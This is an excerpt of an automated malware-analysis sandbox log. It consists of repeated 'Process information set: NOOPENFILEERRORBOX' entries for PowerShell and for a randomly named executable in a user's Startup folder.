Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
